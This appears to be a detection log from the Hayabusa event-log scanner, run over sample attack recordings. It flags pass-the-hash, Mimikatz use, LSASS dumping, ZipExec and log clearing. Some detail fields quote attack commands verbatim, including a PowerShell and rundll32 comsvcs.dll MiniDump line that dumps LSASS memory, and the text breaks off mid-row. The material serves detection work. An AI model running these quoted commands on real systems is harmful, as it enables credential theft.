admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,informational,Logon Type 9 - NewCredentials,User: admmig : Workstation: - : IP Address: ::1 : Port: 0 : LogonID: 0x266e045 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x266e045,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:21.730 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : 
User: OFFSEC\admmig : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,PowerShell Get-Process LSASS,,rules/sigma/process_creation/win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS 
dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full : Path: C:\Windows\System32\rundll32.exe : User: OFFSEC\admmig : Parent Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,critical,Lsass Memory Dump via Comsvcs DLL,,rules/sigma/process_access/sysmon_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 
0x26bdfac,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 49192 : LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 38940 : LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential 
dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to 
Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY 
(process).evtx +2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:13.725 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:22.291 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: cscript.exe //e:jscript testme.js : Path: C:\Windows\System32\cscript.exe : User: 
LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,medium,WSF/JSE/JS/VBA/VBE File Execution,,rules/sigma/process_creation/win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:"""" : Path: C:\Windows\System32\cmdkey.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe"" : Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip : Path: C:\Windows\System32\cmdkey.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript 
testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:14.015 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png"" : Path: C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx +2021-10-22 02:53:42.530 +09:00,FS03.offsec.lan,59,informational,Bits Job Creation,Job Title: BITS Transfer : URL: https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx +2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: mimikatz.exe : Path: C:\TOOLS\Mimikatzx64\mimikatz.exe : User: OFFSEC\admmig : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: mimikatz.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Suspicious GrantedAccess Flags on LSASS 
Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 22:39:49.619 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx +2021-10-22 23:02:11.218 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx +2021-10-22 23:02:15.177 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx +2021-10-24 
06:50:11.666 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: - : Type: 10 : Workstation: - : IP Address: 10.23.23.9 : SubStatus: 0x0 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx +2021-10-24 06:51:57.212 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: - : Type: 10 : Workstation: - : IP Address: 10.23.23.9 : SubStatus: 0x0 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx +2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:09:51.875 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.002 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.080 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.095 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.127 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.142 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.215 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.293 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.340 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.355 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.418 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.480 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 